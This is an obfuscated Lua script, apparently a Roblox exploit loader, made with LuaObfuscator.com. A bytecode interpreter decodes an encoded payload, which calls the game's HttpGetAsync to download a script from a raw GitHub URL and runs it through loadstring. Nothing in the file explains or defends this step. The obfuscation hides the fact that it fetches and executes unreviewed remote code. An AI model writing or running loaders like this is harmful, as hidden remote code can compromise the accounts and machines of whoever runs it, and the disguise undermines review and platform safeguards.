--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then local v75=0;while true do if (v75==0) then v19=v0(v3(v20,1,1));return "";end end else local v76=v2(v0(v20,16));if v19 then local v79=v5(v76,v19);v19=nil;return v79;else return v76;end end end);local function v21(v22,v23,v24)if v24 then local v77=(v22/(2^(v23-(1 + 0))))%(2^(((v24-(1746 -(1121 + 624))) -(v23-(1 + 0))) + (1400 -(1158 + 241))));return v77-(v77%((31 + 1145) -(868 + 307)));else local v78=(1 + 1)^(v23-((1309 + 308) -(1395 + 105 + 116)));return (((v22%(v78 + v78))>=v78) and (1 -0)) or (0 -0);end end local function v25()local v38=0 -0;local v39;while true do if (v38==(1 -0)) then return v39;end if (v38==(0 -0)) then v39=v1(v16,v18,v18);v18=v18 + 1;v38=1;end end end local function v26()local v40,v41=v1(v16,v18,v18 + (359 -(278 + 79)));v18=v18 + (5 -3);return (v41 * 256) + v40;end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (1407 -(1149 + 255)));v18=v18 + (5 -1);return (v45 * (8668352 + 8108864)) + (v44 * (111744 -46208)) + (v43 * (144 + 43 + 69)) + v42;end local function v28()local v46=(0 -0) -0;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(829 -(682 + 144))) then if (v51==(1010 -(455 + 555))) then if (v50==(1517 -(444 + (1558 -485)))) then return v52 * (1057 -(915 + 142));else local v96=74 -(18 + 56);while true do if (v96==(1008 -(182 + 826))) then v51=1;v49=0 -(267 -(45 + 222));break;end end end elseif (v51==2047) then return ((v50==(0 -0)) and (v52 * ((2 -(1 + 0))/(0 + 0)))) or (v52 * NaN);end return v8(v52,v51-(1443 -420)) * (v49 + (v50/((5 -3)^(39 + 13))));end if ((0 -0)==v46) then v47=v27();v48=v27();v46=1;end if (v46==(2 -1)) then v49=2 -1;v50=(v21(v48,1,(129 -71) -38) * (2^32)) + v47;v46=8 -(22 -16);end if (v46==(3 -1)) then v51=v21(v48,2 + 19,706 -(575 + 100));v52=((v21(v48,1312 -(1177 + 103))==(1 + 0)) and  -(1 + 0)) or ((1995 -1020) -((2459 -(1442 + 256)) + 83 + 130));v46=(39 + 2) -(5 + 33);end end end local function v29(v30)local v53;if  not v30 then v30=v27();if (v30==0) then return "";end end v53=v3(v16,v18,(v18 + v30) -(1 + 0));v18=v18 + v30;local v54={};for v67=1 + 0, #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=0 -0;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v55~=(0 + 0)) then else v56=0;v57=nil;v55=1959 -(1270 + 688);end if ((2 + 2)==v55) then while true do if (v56==(1718 -(1594 + 124))) then local v90=0 + 0;while true do if (v90==(0 + 0)) then v57=0;v58=nil;v90=1;end if (v90==(1 + 0)) then v56=1;break;end end end if (v56~=1) then else local v91=0;while true do if (v91~=(1382 -(108 + 1273))) then else v56=2;break;end if (v91==0) then v59=nil;v60=nil;v91=1;end end end if (v56==2) then local v92=0;while true do if (v92~=1) then else v56=3;break;end if (v92==(1478 -(1379 + 99))) then v61=nil;v62=nil;v92=1 -0;end end end if (v56==(1175 -(19 + 1153))) then v63=nil;while true do local v97=0;while true do if (v97==(3 -2)) then if (v57==1) then local v104=587 -(432 + 155);local v105;local v106;while true do if (v104==0) then v105=0 -0;v106=nil;v104=1;end if (v104==1) then while true do if (v105==(0 -0)) then v106=423 -(159 + 264);while true do if (v106~=1) then else for v147=1,v62 do local v148=0 -0;local v149;local v150;local v151;while true do if (v148==(174 -(51 + 123))) then local v158=0 + 0;while true do if (v158==(1 + 0)) then v148=1 + 0;break;end if (v158==0) then v149=0;v150=nil;v158=1 + 0;end end end if ((1842 -(771 + 1070))~=v148) then else v151=nil;while true do if (v149==(2 -1)) then if (v150==1) then v151=v25()~=0;elseif (v150==2) then v151=v28();elseif (v150~=3) then else v151=v29();end v63[v147]=v151;break;end if (v149==0) then local v162=371 -(329 + 42);local v163;while true do if (v162==0) then v163=0;while true do if (v163~=(0 + 0)) then else local v174=0;local v175;while true do if (v174==(0 + 0)) then v175=0 + 0;while true do if (v175~=0) then else v150=v25();v151=nil;v175=1;end if (v175~=(1 -0)) then else v163=1 -0;break;end end break;end end end if (1==v163) then v149=1;break;end end break;end end end end break;end end end v61[305 -(20 + 282)]=v25();v106=2;end if (v106==(4 -2)) then v57=2;break;end if (v106~=0) then else local v131=0;while true do if (v131==1) then v106=1;break;end if (v131==(0 -0)) then local v155=0 + 0;while true do if (v155~=1) then else v131=1 + 0;break;end if (v155==(0 + 0)) then v62=v27();v63={};v155=1 + 0;end end end end end end break;end end break;end end end break;end if (v97==0) then local v103=0;while true do if (v103==1) then v97=1;break;end if (v103~=(0 + 0)) then else if (v57==2) then local v109=0;local v110;while true do if (v109==0) then v110=1329 -(9 + 1320);while true do if (v110~=(421 -(24 + 396))) then else local v132=0 -0;local v133;while true do if (0~=v132) then else v133=1181 -(667 + 514);while true do if ((0 + 0)==v133) then local v159=0;while true do if (v159==(0 -0)) then for v166=2 -1,v27() do v60[v166]=v27();end return v61;end end end end break;end end end if (v110~=0) then else local v134=0 + 0;local v135;while true do if (v134==(845 -(481 + 364))) then v135=0;while true do if (v135==1) then v110=1;break;end if (0==v135) then local v160=0;while true do if (v160~=(1592 -(579 + 1013))) then else for v168=1,v27() do local v169=1462 -(611 + 851);local v170;local v171;while true do if ((1527 -(402 + 1124))~=v169) then else while true do if (v170==0) then v171=v25();if (v21(v171,1 -0,1)==(0 -0)) then local v176=0 -0;local v177;local v178;local v179;local v180;local v181;while true do if (v176~=1) then else v179=nil;v180=nil;v176=1221 -(1166 + 53);end if (v176==2) then v181=nil;while true do if (v177==0) then local v182=0;local v183;while true do if (v182~=0) then else v183=0;while true do if (v183~=1) then else v177=1671 -(843 + 827);break;end if (v183==0) then local v196=0 -0;while true do if (v196==1) then v183=1;break;end if (v196==(0 -0)) then v178=0 + 0;v179=nil;v196=1;end end end end break;end end end if (v177==(1404 -(323 + 1079))) then while true do if (v178~=1) then else local v185=0;local v186;while true do if (v185==(546 -(240 + 306))) then v186=0 + 0;while true do if (v186~=(642 -(424 + 217))) then else v178=2 + 0;break;end if (v186==0) then local v197=0;while true do if (v197==(783 -(440 + 342))) then v186=1;break;end if (v197==0) then v181={v26(),v26(),nil,nil};if (v179==(0 -0)) then local v200=0 + 0;while true do if (v200==(0 + 0)) then v181[374 -(25 + 346)]=v26();v181[11 -7]=v26();break;end end elseif (v179==(3 -2)) then v181[3]=v27();elseif (v179==(1 + 1)) then v181[3]=v27() -((2 -0)^(1108 -(582 + 510)));elseif (v179==(3 + 0)) then local v209=0;local v210;local v211;while true do if (v209==(0 + 0)) then v210=0;v211=nil;v209=1;end if (v209~=(63 -(13 + 49))) then else while true do if (v210~=0) then else v211=256 -(22 + 234);while true do if (v211~=0) then else v181[3]=v27() -((773 -(180 + 591))^(15 + 1));v181[9 -5]=v26();break;end end break;end end break;end end end v197=1;end end end end break;end end end if (v178==2) then local v187=0 -0;local v188;local v189;while true do if (v187==(1912 -(1088 + 823))) then while true do if (v188~=0) then else v189=0;while true do if (v189==0) then if (v21(v180,1,1)==(1 + 0)) then v181[5 -3]=v63[v181[2]];end if (v21(v180,2,1287 -(768 + 517))==1) then v181[4 -1]=v63[v181[3]];end v189=1968 -(771 + 1196);end if (v189==1) then v178=3;break;end end break;end end break;end if (v187==0) then v188=0 + 0;v189=nil;v187=1 -0;end end end if (v178==3) then if (v21(v180,3 -0,3)==(1994 -(628 + 1365))) then v181[1385 -(1227 + 154)]=v63[v181[2 + 2]];end v58[v168]=v181;break;end if (v178~=0) then else local v191=0;local v192;while true do if (v191==(0 -0)) then v192=0;while true do if (v192==1) then v178=1;break;end if (v192~=0) then else local v198=0;while true do if (v198==(0 + 0)) then local v199=0 -0;while true do if (1==v199) then v198=1612 -(1526 + 85);break;end if (0~=v199) then else v179=v21(v171,2 + 0,200 -(117 + 80));v180=v21(v171,4 + 0,11 -5);v199=1;end end end if (v198==(1046 -(954 + 91))) then v192=1;break;end end end end break;end end end end break;end if (v177~=1) then else local v184=0 -0;while true do if (v184~=(4 -3)) then else v177=2;break;end if (v184~=(0 -0)) then else local v193=0;while true do if (v193==1) then v184=1 + 0;break;end if (v193~=0) then else v180=nil;v181=nil;v193=3 -2;end end end end end end break;end if (v176~=0) then else v177=0;v178=nil;v176=1;end end end break;end end break;end if (v169~=0) then else v170=0;v171=nil;v169=1;end end end for v172=1 + 0,v27() do v59[v172-(1568 -(1165 + 402))]=v33();end v160=1;end if (v160~=1) then else v135=1;break;end end end end break;end end end end break;end end end if (v57~=0) then else local v111=0 + 0;local v112;while true do if (v111==(0 -0)) then v112=1771 -(275 + 1496);while true do if (v112==1) then local v136=0 -0;local v137;while true do if (v136~=(0 + 0)) then else v137=0 -0;while true do if (v137==(2 -1)) then v112=1 + 1;break;end if ((0 -0)==v137) then v60={};v61={v58,v59,nil,v60};v137=1354 -(535 + 818);end end break;end end end if (v112==2) then v57=1 -0;break;end if (v112==(0 + 0)) then local v138=742 -(410 + 332);while true do if ((0 -0)~=v138) then else local v156=0;while true do if (v156==1) then v138=1 + 0;break;end if (v156~=(0 + 0)) then else v58={};v59={};v156=1;end end end if ((1 + 0)==v138) then v112=3 -2;break;end end end end break;end end end v103=1;end end end end end break;end end break;end if ((2 + 0)~=v55) then else v60=nil;v61=nil;v55=3;end if (v55==(7 -4)) then v62=nil;v63=nil;v55=4;end if (v55==1) then v58=nil;v59=nil;v55=2;end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==1) then v72={...};v73=v12("#",...) -1;v69=2;end if (v69==3) then A,B=v32(v11(v74));if  not A[1] then local v93=v35[4][v70] or "?";error("Script error at ["   .. v93   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (v69==2) then v74=nil;v74=function()local v80=v64;local v81=v65;local v82=v66;local v83=v32;local v84={};local v85={};local v86={};for v94=0,v73 do if ((v94>=v82) or ((9795 -7279)<(3748 -(480 + 1032)))) then v84[v94-v82]=v72[v94 + (1 -0)];else v86[v94]=v72[v94 + 1 + 0];end end local v87=(v73-v82) + 1 + 0;local v88;local v89;while true do local v95=0 -0;while true do if ((v95==(0 -0)) or ((20 + 783)>=(5994 -(202 + 1683)))) then local v102=0 -0;while true do if ((((8211 -5762) + 30)>=((834 + 4091) -3283)) and (v102==(1 + 0))) then v95=1 + (0 -0);break;end if (((0 -(0 -0))==v102) or ((3890 -(968 + 192 + 659))>((17804 -13302) -2098))) then v88=v80[v70];v89=v88[1572 -(1123 + 448)];v102=482 -(378 + 103);end end end if ((v95==(1 + (1402 -(1028 + 374)))) or ((2504 + 1439)<=(2611 -(774 + 585)))) then if (((1365 + 11)<(1299 + 1756)) and (v89<=((1176 -(203 + 968)) -3))) then if (((10532 -7007)>=((2275 + 2337) -(376 + 1344))) and (v89<=(0 + 0))) then v86[v88[2 + 0]]();elseif ((v89==(564 -(79 + 484))) or ((4301 + 172)<((2308 -(1090 + 839)) + 1968))) then v86[v88[4 -2]]=v37[v88[6 -3]];else do return;end end elseif ((v89<=((2740 -(637 + 426)) -(1334 + 339))) or ((8352 -5131)<=(909 -584))) then if (((2061 -(13 + 170 + 1068))<(5249 -(166 + (1486 -497)))) and (v89>(4 -1))) then local v115=0 + 0;local v116;local v117;while true do if ((v115==(266 -(195 + 71))) or ((8774 -5297)<(13076 -9757))) then v116=(1054 -(231 + 823)) -0;v117=nil;v115=1 + 0;end if ((v115==(2 -(1947 -(872 + 1074)))) or ((5667 -(233 + 1009))>(16057 -11556))) then while true do if (((4405 -(217 + 636))>=(1383 -412)) and (v116==(0 + 0 + 0))) then v117=v88[195 -(161 + 32)];v86[v117]=v86[v117](v13(v86,v117 + (999 -(150 + 848)),v71));break;end end break;end end else local v118=0 + 0;local v119;local v120;local v121;local v122;local v123;while true do if ((v118==1) or (((3585 -(997 + 455)) + 770)==(5979 -2778))) then v121=nil;v122=nil;v118=1120 -((376 -226) + 968);end if (((14 + 531)==((715 -319) + 149)) and ((7 -5)==v118)) then v123=nil;while true do if ((v119==(2 + (0 -0))) or ((2135 + 1045)>=(8046 -4356))) then for v152=v120,v71 do local v153=0 -0;local v154;while true do if (((17696 -12704)>=(1935 -1372)) and (v153==(0 -0))) then v154=0 -0;while true do if (((4981 -(223 + 225 + 219))==(5579 -(402 + (1758 -895)))) and (v154==0)) then v123=v123 + (290 -(66 + 223));v86[v152]=v121[v123];break;end end break;end end end break;end if (((2501 -(751 + 1157))<=(4142 -2733)) and (v119==(0 + 0))) then local v141=0;while true do if (((8949 -5029)>1807) and (v141==(1433 -(561 + 871)))) then v119=866 -(475 + 390);break;end if ((v141==(712 -(229 + 483))) or ((5977 -3017)==(1420 -(85 + 87)))) then v120=v88[934 -(257 + 675)];v121,v122=v83(v86[v120](v13(v86,v120 + (1 -0),v88[58 -(45 + 10)])));v141=3 -2;end end end if ((v119==(549 -(122 + 426))) or ((182 + (1338 -1004))>(5044 -(1618 + 1778)))) then v71=(v122 + v120) -(1 + 0);v123=0 -0;v119=420 -(86 + 332);end end break;end if (((5988 -(201 + 804))>(4646 -(425 + 304))) and (v118==(741 -(686 + 55)))) then v119=0 + 0;v120=nil;v118=3 -2;end end end elseif ((v89>(3 + 2)) or ((2989 + 721)<=(3467 -(104 + 471)))) then local v124=0 -0;local v125;local v126;local v127;while true do if ((v124==(0 -(0 + 0))) or (((8764 -4137) -2432)<=1660)) then v125=(3220 -(1350 + 45)) -(1489 + 336);v126=nil;v124=(1192 -(31 + 267)) -((22 -13) + 884);end if ((((253 + 1162) -(94 + 1320))==v124) or ((3535 -1985)>3192)) then v127=nil;while true do if ((v125==(3 -2)) or ((2070 + 1361)==(4522 -(504 + (4873 -3565))))) then v86[v126 + 1]=v127;v86[v126]=v127[v88[4]];break;end if ((v125==0) or ((673 + 1755)<=(1946 -(28 + 1124)))) then v126=v88[121 -(45 + 74)];v127=v86[v88[2 + 1]];v125=2 -1;end end break;end end else v86[v88[2 + 0 + 0]]=v88[1 + (5 -3)];end v70=v70 + (650 -(533 + 116));break;end end end end;v69=3;end if (v69==0) then v70=1;v71= -1;v69=1;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63033D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F542O6F6C73706F702F6C6F6C2F6D61696E2F7363726970746B736700083O0012013O00013O001201000100023O002006000100010003001205000300044O0003000100034O00045O00026O000100012O00023O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
